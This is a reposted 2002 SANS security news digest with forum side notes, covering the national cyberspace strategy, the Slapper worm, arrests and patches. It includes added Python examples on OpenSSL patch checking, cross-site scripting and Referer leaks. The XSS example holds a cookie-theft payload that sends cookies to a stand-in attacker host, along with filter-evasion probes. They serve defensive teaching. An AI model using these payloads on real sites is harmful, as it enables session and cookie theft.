Brought to you by our friends at the SANS Institute.


Things of interest in this issue:
  • ARTICLES ON THE NATIONAL STRATEGY FOR SECURING CYBERSPACE (NSSC)
  • Suspected Slapper Author Arrested; New Variant on the Loose
  • Continuing Cisco VPN 5000 Vulnerabilities
  • XP Service Pack Causes Problems
  • Patches Available for Microsoft Java VM Vulnerabilities *I know a lot of people have been complaining about this*
  • Norton Found In Contempt of Court for Failing to Address Computer Security Issues
  • Article demonstrating the changes in information warfare.



What are your thoughts on this week's news?




***********************************************************************
SANS NewsBites September 23, 2002 Vol. 4, Num. 39
***********************************************************************

ARTICLES ON THE NATIONAL STRATEGY FOR SECURING CYBERSPACE (NSSC)
18 September 2002 NSSC Avoids Regulations; Critics Say it Lacks
Necessary Muscle
16 & 19 September 2002 NSSC Summary
17-19 September 2002 Variety of Experts Chat With Washington Post
About the NSSC
17 September 2002 Home Users Know the Drill but Don't Abide By It

A TIME LINE
18 September 2002 Cyber Security Time Line
xmaddness's side note:
We are actually holding discussions here at AntiOnline about what we, the security/Computer Admins, would like to see added to this bill. If you would like to be involved send me a Private Message.

THE REST OF THE WEEK'S NEWS
23 September 2002 Suspected Slapper Author Arrested; New Variant on
the Loose

16 & 17 September 2002 Slapper Worm
23 September 2002 al Qaeda May Have Structural Analysis Software
22 September 2002 Scottish Pol's E-Mail Spoofed
21 September 2002 Client Employee Arrested for Data Theft
20 September 2002 Cisco VPN 5000 Vulnerabilities
20 September 2002 VeriSign Won't Disclose .gov Info
20 September 2002 Oregon Cyber Security Awareness Program for Youth
20 September 2002 XP Service Pack Causes Problems
19 & 20 September 2002 Suspected T0rn Rootkit Author Arrested
19 September 2002 Disgruntled Former Employee Gets Prison Sentence
for Erasing Company Data
19 September 2002 Nokia Decries Warchalking
18 & 19 September 2002 Patches Available for Microsoft Java VM
Vulnerabilities

18 & 19 September 2002 Falun Gong Members on Trial for TV Hacking
18 September 2002 Gartner Advises Waiting to Deploy Yukon
18 September 2002 Bush Appoints 24 to NIAC
17 & 18 September 2002 Norton Found In Contempt of Court for Failing
to Address Computer Security Issues

17 September 2002 Glue: The Latest in Anti-Piracy Technology
17 September 2002 Paul Kocher Interviewed on Cryptography
16 September 2002 Senate Homeland Security Bill Would Broaden
Indemnity
16 September 2002 Analysis Finds More Government Sites Have Security
and Privacy Policies
16 September 2002 Informal Airport LAN Audit Reveals Lax Security
16 September 2002 Sites Still Vulnerable to Cross-Site Scripting
15 & 16 September 2002 Mozilla Browser Privacy Hole

ARTICLES ILLUSTRATING CHANGES IN INFORMATION WARFARE
16 September 2002 ABCNews Hired Firm to Test CA Police Dept. Security
From Afar
16 September 2002 Nimda Changed IT Security Thinking

FREE WEB BROADCAST: October 2, 1:00 PM EDT (1700 UTC).
Dustin Childs covers the basics of event logs in Windows NT and 2000,
the managing of logs, and when you can and cannot completely trust
those logs. Listen live and ask questions, or, once you have an access
code, sign on later to listen to the web cast at your leisure.
Register in advance to get the handouts:
http://sans.digisle.tv/audiocast_100202/brief.htm

SECURITY TRAINING NEWS
*SANS Network Security 2002 in October: Largest security conference &
expo: http://www.sans.org/NS2002
*SANS Cyber Defense Initiative in San Francisco - Dec. 15-20
Featuring 8 hands-on SANS immersion training tracks. San Francisco
is usually warmer in December than in August.
*Advanced security training in fifty additional cities, plus Local
Mentor programs in 35 cities. See: http://www.sans.org


ARTICLES ON THE NATIONAL STRATEGY FOR SECURING CYBERSPACE

--18 September 2002 NSSC Avoids Regulations; Critics Say it Lacks
Necessary Muscle

The National Strategy to Secure Cyberspace encourages home users to
adopt safe computing practices but shies away from creating federal
regulations to attain cyber security. Critics say the strategy has no
teeth, that all ideas that might have proven objectionable to anyone
have been removed.
http://online.securityfocus.com/news/677
http://www.washingtonpost.com/wp-dyn...2002Sep18.html
NSSC text: http://www.whitehouse.gov/pcipb/cyberstrategy-draft.pdf

--16 & 19 September 2002 NSSC Summary
The National Strategy to Secure Cyberspace draft recommendations by
sector: consumer and small business, large companies, governments
and universities and international partners. The draft also lists 18
national cyber security priorities.
http://www.washingtonpost.com/wp-dyn...2002Sep19.html
http://www.fcw.com/fcw/articles/2002...t-09-16-02.asp

--17-19 September 2002 Variety of Experts Chat With Washington Post
About the NSSC

Online transcripts of chats with various people about NSSC
Alan Paller (SANS):
http://www.washingtonpost.com/wp-srv...ller091802.htm
Scott Charney (Microsoft):
http://www.washingtonpost.com/wp-srv...rney091702.htm
Richard Smith:
http://www.washingtonpost.com/wp-srv...mith091902.htm
[Editors' Comment on the Strategy:
(Ranum) It's not a strategy; it's a statement of the obvious. It
would have been more effective if The President simply asked the
hackers to be nice and cease and desist.
(Murray): Did anyone find any mention of cryptography? I found
no mention of strong authentication (except for home users; weak
passwords on their systems are not being attacked). I found no mention
of closed networks. Anyone find any mention of holding edge connectors
responsible for their traffic or for enforcing source IP addresses? The
report's solution to the broken transport layer is to avoid the use
of wireless. Its solution to the problem of weak systems connected
to the Internet is more "patch and fix." Did anyone find mention of
safe defaults? Are all these things too controversial even to float?]

xmaddness's side notes:
We have been reading through this, and one thing I noticed was that they use the term "Hacker" to describe a malicious cracker. That right there tells me they did not spend enough time with the actual security/hackers to know what to really look for. We need to stop letting the big dogs write bills that will do nothing. Again, PM me if you would like to contribute.


--17 September 2002 Home Users Know the Drill but Don't Abide By It
The recently released draft of the National Strategy to Secure
Cyberspace recommends that home users deploy firewalls, use
regularly updated anti-virus software, create strong passwords,
install all necessary patches and use common sense about e-mail and
downloads. Though these pieces of advice are well-known, many home
users do not adhere to them.
http://www.washingtonpost.com/wp-dyn...2002Sep17.html

A TIME LINE

--18 September 2002 Cyber Security Time Line
This page offers a brief time-line of computer bugs, viruses, worms
and attacks from the 1945 moth in Navy computer relays to the Morris
worm to Melissa author David Smith's sentencing. Also includes cyber
milestones such as the development of ASCII, the launch of ARPANET
and the appointment of the nation's first "cyber security czar."
http://www.washingtonpost.com/wp-dyn...2002Jun26.html
[Editor's Note (Northcutt): I enjoyed the retelling of the cyber
security story. It appears the rate of change in security is
accelerating.]


THE REST OF THE WEEK'S NEWS

--23 September 2002 Suspected Slapper Author Arrested; New Variant
on the Loose

A man has been arrested on suspicion of authoring the Slapper worm;
the worm evidently was sending infected machine addresses back to
his Ukraine-based e-mail address. Though the original Slapper worm
activity appears to be calming down, a variant has been detected in
the wild and has been spreading in Australia.
http://www.vnunet.com/News/1135274
http://www.news.com.au/common/story_page/0,4057,5151968^15306,00.html

--16 & 17 September 2002 Slapper Worm
The Linux.Slapper.Worm exploits a buffer overflow in the OpenSSL
library (in its SSLv2 handshake code) as used by Apache web servers on
Linux, and is believed to be the first worm to make use of P2P
technology. The worm has infected at least 30,000 servers. Infected
machines are directed to join a P2P network, which could be used to
launch distributed denial of service attacks. The worm scans port 80
to identify Apache servers, then delivers its exploit over the SSL
port (443). A fix is available: OpenSSL versions 0.9.6e and newer are
not affected, and servers that do not need SSLv2 can disable it.
http://www.computerworld.com/securit...,74288,00.html
http://www.wired.com/news/technology...,55172,00.html
http://news.com.com/2100-1001-958122.html
http://www.theregister.co.uk/content/55/27134.html
http://www.msnbc.com/news/808678.asp?0dm=C224T
http://www.vibrantmedia.com/computer...ticleID=235074
http://www.computerworld.com/securit...,74325,00.html
CERT/CC Advisory: http://www.cert.org/advisories/CA-2002-27.html
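The fix level quoted above (0.9.6e) is the sort of thing an admin has to check across a fleet of web servers. The script below is an added example, not code from the newsletter, CERT or the OpenSSL project: it parses the banner that `openssl version` prints (assumed to follow the upstream "major.minor.patch[letters]" layout, e.g. "OpenSSL 0.9.6e 30 Jul 2002"), compares it against 0.9.6e with the letter suffix ordered correctly, and triages a constructed inventory of hypothetical hosts.

```python
"""Flag OpenSSL builds still below the Slapper fix level.

Added example; not code from the newsletter, CERT or the OpenSSL project.
It assumes the upstream version string layout "major.minor.patch[letters]"
as printed by `openssl version` (e.g. "OpenSSL 0.9.6e 30 Jul 2002"), and
the fix level 0.9.6e stated in the article.
"""
import re
import subprocess

FIXED_VERSION = "0.9.6e"

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)([a-z]*)")


def parse_openssl_version(text):
    """Turn '0.9.6e' or 'OpenSSL 0.9.6e 30 Jul 2002' into a comparable tuple.

    The letter suffix sorts after the bare release, so
    0.9.6 < 0.9.6a < 0.9.6e; a missing suffix compares as "".
    """
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError("unrecognised OpenSSL version string: %r" % text)
    major, minor, patch, letters = m.groups()
    return (int(major), int(minor), int(patch), letters)


def is_below_fix(version_text, fixed=FIXED_VERSION):
    """True when the reported version predates the fixed release."""
    return parse_openssl_version(version_text) < parse_openssl_version(fixed)


def local_openssl_version():
    """Banner of the OpenSSL on this host, or None if `openssl` is absent."""
    try:
        proc = subprocess.run(["openssl", "version"], capture_output=True,
                              text=True, check=True)
    except (OSError, subprocess.CalledProcessError):
        return None
    return proc.stdout.strip()


# Constructed inventory (hypothetical hosts): banner as `openssl version`
# would print it on each box.
SAMPLE_INVENTORY = {
    "web1.example": "OpenSSL 0.9.6d 9 May 2002",
    "web2.example": "OpenSSL 0.9.6e 30 Jul 2002",
    "web3.example": "OpenSSL 0.9.6b 9 Jul 2001",
    "web4.example": "OpenSSL 0.9.6g 9 Aug 2002",
}


def triage(inventory):
    """Hosts whose banner is below the fix level, sorted by name."""
    return sorted(host for host, banner in inventory.items()
                  if is_below_fix(banner))


if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print("below %s: %s (%s)" % (FIXED_VERSION, host,
                                     SAMPLE_INVENTORY[host]))
    print("this host:", local_openssl_version())
```

Two caveats a practitioner should keep in mind. Distributions often backport the fix without bumping the upstream version string, so a banner reading 0.9.6b may already be patched; for packaged builds, check the vendor's package changelog rather than trusting the banner alone. And a fixed library on disk says nothing about the process in memory: an Apache that was not restarted after the upgrade is still running the old code.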

--23 September 2002 al Qaeda May Have Structural Analysis Software
According to an FBI bulletin, a computer belonging to a bin Laden
associate contained software that can be used to find structural
weaknesses in large structures like dams and skyscrapers.
http://news.com.au/common/story_page/0,4057,5149311^421,00.html

--22 September 2002 Scottish Pol's E-Mail Spoofed
A hacker spoofed the e-mail account of Member of the Scottish
Parliament (MSP) Fiona Hyslop and used it to send spam. Detectives
have been called in.
http://www.scotlandonsunday.com/poli...?id=1053342002

--21 September 2002 Client Employee Arrested for Data Theft
A Chinese oil company employee who was receiving training to use
advanced seismic imaging software from 3DGeo Development was arrested
after it was alleged that he had accessed 3DGeo proprietary code and
copied it onto his laptop. If convicted, Shan Yan Ming could face
five years in prison and a $250,000 fine.
http://www.bayarea.com/mld/mercuryne...ss/4121880.htm

--20 September 2002 Cisco VPN 5000 Vulnerabilities
Security holes in Cisco VPN 5000 Client software could allow an
attacker to attain root access to local workstations running the
software or to grab passwords. The root access hole affects the 5.2.7
for Linux and 5.2.8 for Solaris versions of the software, while the
password vulnerability is present in the version for Macintosh in
all versions prior to 5.2.2. Cisco has placed updates on its website.
http://www.idg.net/ic_950944_5055_1-2793.html

--20 September 2002 VeriSign Won't Disclose .gov Info
VeriSign Inc. will no longer supply the public with data about the
.gov Internet domain because the company fears the information could
be used to plot cyber attacks.
http://www.theregister.co.uk/content/55/27210.html

--20 September 2002 Oregon Cyber Security Awareness Program for Youth
The Hillsboro, Oregon police department plans to launch a cybersecurity
awareness program aimed at young people. The Cyber Awareness,
Responsibility and Ethics program will begin at the Boys and Girls
Clubs of Hillsboro and eventually spread to the schools. The program
hopes to educate area youth about the effect their actions can have;
it will also encourage constructive cyber experimentation under the
guidance of other young people.
http://www.oregonlive.com/metrowest/...3123238162.xml
[Editor's Note (Schultz): Ultimately, strategic gains in the
information security arena will be due to efforts like the one
described in this news item. The next generation merits our full
attention when it comes to security education and awareness.]

--20 September 2002 XP Service Pack Causes Problems
A small group of Windows XP customers has reported having problems
with the operating system's first service pack which was released on
September 9th. Among the problems cited are slow-running machines,
unstable systems and crashing programs.
http://www.pcworld.com/news/article/0,aid,105144,00.asp
[Editor's Note (Murray): Toshiba advised me to re-install XP from
scratch to get rid of the service pack.]

--19 & 20 September 2002 Suspected T0rn Rootkit Author Arrested
A 21-year-old UK man has been arrested on suspicion of writing the
T0rn rootkit, which helps people attack Linux based servers and was
used by the Lion worm. Officers from Scotland Yard's Computer Crime
Unit arrested the man, whose name has not been released, under the
country's 1990 Computer Misuse Act. He is presently out on bail.
http://www.theregister.co.uk/content/55/27200.html
http://news.bbc.co.uk/2/hi/technology/2270962.stm
http://www.usatoday.com/tech/news/20...d-hacker_x.htm

--19 September 2002 Disgruntled Former Employee Gets Prison Sentence
for Erasing Company Data
A UK computer engineer who botched a job went back into the company's
computer system and wiped out their data after the company refused to
pay his bill; Stephen Carey had altered the company's computer system
so he could access the database from home. Police who seized the man's
home computer found that the time the files were destroyed matched
the time his home computer was connected to the company's. Carey
received an 18-month prison sentence for unauthorized modification
of computer material.
http://www.ds-osac.org/edb/cyber/new...y.cfm?KEY=9061

--19 September 2002 Nokia Decries Warchalking
Nokia has issued an advisory condemning warchalking, the practice of
marking the locations of wireless access points outside buildings. The
company maintains that people who use bandwidth without paying for
it are thieves. A number of readers' comments are posted along with
the article.
http://news.bbc.co.uk/2/hi/technology/2268224.stm

--18 & 19 September 2002 Patches Available for Microsoft Java VM
Vulnerabilities

Microsoft issued a security bulletin urging Windows users to apply
two patches for vulnerabilities in the company's Java Virtual
Machine. The flaws affect all versions of the Microsoft VM, including the most
recent (5.0.3805). The flaws could be exploited to gain control of
vulnerable machines by sending users specially crafted HTML e-mail
or enticing them to visit specially constructed web sites.
http://news.com.com/2100-1001-958547.html
http://www.computerworld.com/securit...,74365,00.html
http://www.microsoft.com/technet/sec...n/MS02-052.asp

--18 & 19 September 2002 Falun Gong Members on Trial for TV Hacking
Fifteen members of the Falun Gong spiritual movement in China
have gone on trial for hacking into a cable television network and
broadcasting pro-Falun Gong footage. If found guilty, each member
could face between three and seven years in prison.
http://news.bbc.co.uk/1/hi/world/asi...ic/2267523.stm
http://asia.cnn.com/2002/WORLD/asiap...ong/index.html

--18 September 2002 Gartner Advises Waiting to Deploy Yukon
Analysts are warning users not to deploy the upcoming version of
Microsoft SQL server, known as Yukon, because it is likely to contain
numerous security holes. Gartner is advising users to wait for the
release of Service Pack 1.
http://www.vnunet.com/News/1135116
[Editor's Note (Schultz): The competence of this advice from the
Gartner Group is extremely dubious. It appears to be a massive
overgeneralization that does not take this specific product into
account. Did the Gartner Group even ask Microsoft how this product
fared with security testing? What about Windows XP? It would be
difficult to claim that it was full of security holes (although
some [(Paller) *many*] were discovered) and should thus not be used
until SP1 was available. Also, the statement to the effect that if an
organization uses Yukon, it should minimize the services that are run,
adds absolutely nothing. You should always run only essential services,
regardless of whether the product is a Microsoft product.]

--18 September 2002 Bush Appoints 24 to NIAC
President Bush has appointed 24 people to the National Infrastructure
Advisory Committee (NIAC). The committee makes recommendations about
national security and economic critical infrastructure cyber security;
it also addresses cyber security partnerships between the public and
private sectors. The council members are drawn from major economic
sectors, like energy, transportation and banking, and from law
enforcement, academia and state and local government.
http://www.whitehouse.gov/news/relea...020918-12.html

--17 & 18 September 2002 Norton Found In Contempt of Court for
Failing to Address Computer Security Issues

Interior Secretary Gale Norton and Assistant Secretary for Indian
affairs Neal McCaleb have been found in contempt of court for failing
to adequately address vulnerable computer systems that manage Indian
trust fund accounts. The entire Interior department was taken off
line late last year when it became clear that its computer systems
lacked adequate security.
http://www.fcw.com/fcw/articles/2002...t-09-17-02.asp
http://www.gcn.com/vol1_no1/daily-updates/20053-1.html
xmaddness's side note
This is one of the things that we are also discussing in our bill, a .gov to force companies to patch their holes.



--17 September 2002 Glue: The Latest in Anti-Piracy Technology
In yet another attempt to thwart music pirates, one record company is
giving reviewers CDs sealed into players with headphone jacks sealed
so the CD cannot be re-recorded. At least one reviewer was able to
retrieve the CD, however.
http://www.iht.com/articles/70893.html
http://www.vnunet.com/News/1135077

--17 September 2002 Paul Kocher Interviewed on Cryptography
In an interview, cryptographer Paul Kocher discusses how the increasing
complexity of cryptography affects computer security.
http://www.businessweek.com/technolo...20917_5283.htm

--16 September 2002 Senate Homeland Security Bill Would Broaden
Indemnity
An amendment to the Senate's version of the Homeland Security Bill
would have the government pay liability damages beyond the private
coverage held by designated homeland security vendors. Critics are
concerned that the extension of this indemnity would have a negative
impact on the quality of security products.
http://www.computerworld.com/governm...,74279,00.html

--16 September 2002 Analysis Finds More Government Sites Have
Security and Privacy Policies
Brown University's Center for Public Policy analyzed 1,265 federal
and state government web sites; among their findings were marked
increases in the number of sites with security and privacy policies
when compared with the sites last year. The study also noted that
some sites restrict access to certain information.
http://www.gcn.com/vol1_no1/daily-updates/20026-1.html

--16 September 2002 Informal Airport LAN Audit Reveals Lax Security
A recent audit of wireless LANs at airports in Chicago, San Francisco,
San Diego and Atlanta revealed that many were not running even basic
security measures; only about 25% of the access points had WEP
encryption turned on. Some access points were also running DHCP,
handing out network addresses to any client that associated. The audit
was informal, conducted as an executive at a security research firm
traveled through various airports over the course of a week.
http://www.computerworld.com/mobilet...,74271,00.html

--16 September 2002 Sites Still Vulnerable to Cross-Site Scripting
A significant number of web sites are vulnerable to cross-site
scripting attacks, despite warnings about the problem that have been
out for six months. Crackers have exploited the vulnerabilities to
publish phony press releases and to steal credit card information
and cookies. Addressing the problem on each site can be complicated
and time consuming, because every place where untrusted input is
echoed into a page has to be found and encoded. It is also possible
that because the affected site is the party delivering the malicious
code, it could be liable for damages.
http://www.vnunet.com/News/1135064
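To make the cookie-theft scenario concrete, here is an added example (not code from any site the article mentions) showing the vulnerable pattern, the blocklist "fix" that many sites applied and why it fails, and context-correct output encoding. The search-page template, the attacker host and the probe strings are all constructed for the illustration.

```python
"""Reflected cross-site scripting: vulnerable rendering, a blocklist that
fails, and context-correct output encoding.

Added example; none of this is code from the sites the article mentions.
The search-page template, attacker host and probe strings are constructed.
"""
import html
from urllib.parse import quote

TEMPLATE = "<h1>Results for %s</h1>"


def search_page_vulnerable(query):
    """Untrusted input copied straight into the HTML response."""
    return TEMPLATE % query


def search_page_blocklist(query):
    """A common fix of the period: strip one tag name. Event handlers and
    nested tags walk straight past it."""
    return TEMPLATE % query.replace("<script>", "").replace("</script>", "")


def search_page_fixed(query):
    """Encode for the context the data lands in: HTML text content."""
    return TEMPLATE % html.escape(query, quote=True)


def link_fixed(query):
    """Same data in two other contexts: a URL query component (percent-
    encoded) inside an attribute (HTML-escaped), then text content."""
    href = "/search?q=" + quote(query, safe="")
    return '<a href="%s">%s</a>' % (html.escape(href, quote=True),
                                      html.escape(query, quote=True))


# Constructed probes of the kind used to steal cookies via XSS.
COOKIE_THEFT = ('<script>document.location="http://attacker.example/?c="'
                '+document.cookie</script>')
HANDLER_PROBE = '<img src=x onerror="alert(document.cookie)">'
NESTED_PROBE = "<scr<script>ipt>alert(document.cookie)</script>"


def raw_tag_count(rendered):
    """Number of '<' beyond the two the template itself contributes; any
    value above zero is untrusted markup reaching the browser unencoded."""
    return rendered.count("<") - TEMPLATE.count("<")


if __name__ == "__main__":
    for name, render in (("vulnerable", search_page_vulnerable),
                         ("blocklist", search_page_blocklist),
                         ("fixed", search_page_fixed)):
        for probe in (COOKIE_THEFT, HANDLER_PROBE, NESTED_PROBE):
            print("%-10s raw tags: %d" % (name, raw_tag_count(render(probe))))
```

The blocklist version stops the textbook payload and nothing else: an event handler on an image tag never contains the string `<script>`, and the nested probe reassembles into one after the inner tag is removed. Encoding on output is what closes the hole, and the encoding depends on where the data lands (text, attribute, URL component), which is why cleaning up a large site is the slow job the article describes. Marking session cookies HttpOnly, where the browser honors it, limits what a payload that does slip through can read.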

--15 & 16 September 2002 Mozilla Browser Privacy Hole
A privacy flaw in the Mozilla browser sends the Referer header on
navigations that should not carry one: when a user types an address
into the location bar or opens a bookmark, the web server of the new
site is still told the URL of the page the user was viewing last. The
flaw affects at least versions 1.0, 1.0.1 and 1.1 of Mozilla, as well
as Netscape 7 and Galeon, which share its engine.
http://news.com.com/2100-1001-958001.html
http://www.computerworld.com/securit...,74297,00.html
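The Referer header carries the URL of the page the user came from to the server of the page being requested, so the decision of when to send it is where the privacy line is drawn. The script below is an added example, not Mozilla code: it puts the leaky behaviour the article describes next to the expected policy (Referer only when a link was followed, never on an https-to-http downgrade, never with credentials or fragment) and runs both over a constructed browsing session. The navigation labels 'link', 'typed' and 'bookmark' are assumed for the illustration.

```python
"""Referer policy: the leaky behaviour beside the expected one.

Added example, not Mozilla code. It models the Referer header, which
carries the URL of the page the user came from to the server of the page
being requested. The navigation labels 'link', 'typed' and 'bookmark' and
the browsing session below are assumptions for the illustration.
"""
from urllib.parse import urlsplit


def referer_leaky(previous_url, next_url, navigation):
    """The flawed behaviour: whatever page was open last goes out as the
    Referer, even when the user typed the new address or used a bookmark."""
    return previous_url


def referer_expected(previous_url, next_url, navigation):
    """Send a Referer only when the user followed a link from the previous
    page, never on an https-to-http downgrade (RFC 2616, 15.1.3), and never
    the user:password@ or #fragment parts of the previous URL."""
    if navigation != "link":
        return None
    prev, nxt = urlsplit(previous_url), urlsplit(next_url)
    if prev.scheme == "https" and nxt.scheme != "https":
        return None
    netloc = prev.hostname or ""
    if prev.port:
        netloc += ":%d" % prev.port
    path = prev.path or "/"
    query = "?" + prev.query if prev.query else ""
    return "%s://%s%s%s" % (prev.scheme, netloc, path, query)


# Constructed session: (URL loaded, how the user got there).
SESSION = [
    ("http://news.example/front?edition=late", "typed"),
    ("https://bank.example/login?acct=12345", "typed"),
    ("http://mail.example/inbox", "bookmark"),
    ("http://mail.example/read?id=7", "link"),
]


def referers_received(session, policy):
    """For each page in the session, the Referer its server would receive."""
    seen = []
    previous = None
    for url, navigation in session:
        referer = policy(previous, url, navigation) if previous else None
        seen.append((url, referer))
        previous = url
    return seen


if __name__ == "__main__":
    for name, policy in (("leaky", referer_leaky),
                         ("expected", referer_expected)):
        print(name)
        for url, referer in referers_received(SESSION, policy):
            print("  %-42s Referer: %s" % (url, referer))
```

Under the leaky policy the mail server learns the bank URL, account number included, because the user opened a bookmark right after banking; under the expected policy it learns nothing. The server-side lessons are the same either way: never put secrets or account identifiers in query strings, since every URL is a candidate Referer, and never treat the Referer header as authentication, since the client decides whether and what to send.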

ARTICLES ILLUSTRATING CHANGES IN INFORMATION WARFARE
(Northcutt) The next two articles help us understand the future of
information warfare. Malicious code is essentially asymmetric. It is
a lot cheaper to write a worm than to clean up after one has infected
your systems. A determined adversary with a substantial technology
base could create a variety of attacks that have never been seen
before and release them at the same time. As long as they do not
gain entry into specialized command and control networks that are
supposedly not connected to the Internet, the result is more likely
to be a nuisance than a nightmare. As Ed Skoudis put it, "I'm looking
forward to an Internet 'snow day', I could use the rest".

--16 September 2002 ABCNews Hired Firm to Test CA Police
Dept. Security From Afar
In a "swarming attack," terrorists would attack both physically and
on the cyber space front; the forthcoming National Strategy to Secure
Cyberspace is designed to address such concerns. In an effort to
discover what kind of havoc hackers could wreak from afar, ABCNews
hired a Colorado Springs-based computer security consulting firm
to break into a California police department's computer system. The
hackers mapped the department's network, sent a phony e-mail from the
chief to a detective, and tried to send the chief a Trojan horse,
which was blocked by the department's virus detection system. They
also sent fake warnings to every screen in the department before they
disclosed their identity. The police department officials were aware
that the attack was going to take place; they just didn't know when.
http://abcnews.go.com/sections/wnt/D...ror020913.html

--16 September 2002 Nimda Changed IT Security Thinking
The spread of the Nimda worm had a greater effect on cyber security
than did the September 11th terrorist attacks. The worm, which
debuted a year ago, spread not only through e-mail attachments,
but also through shared files on servers. It broadened the focus
of security to encompass not only network and perimeter security,
but application and database security as well. It also drove home
the point that patches and updates need to be applied quickly.
http://www.computerworld.com/securit...,74284,00.html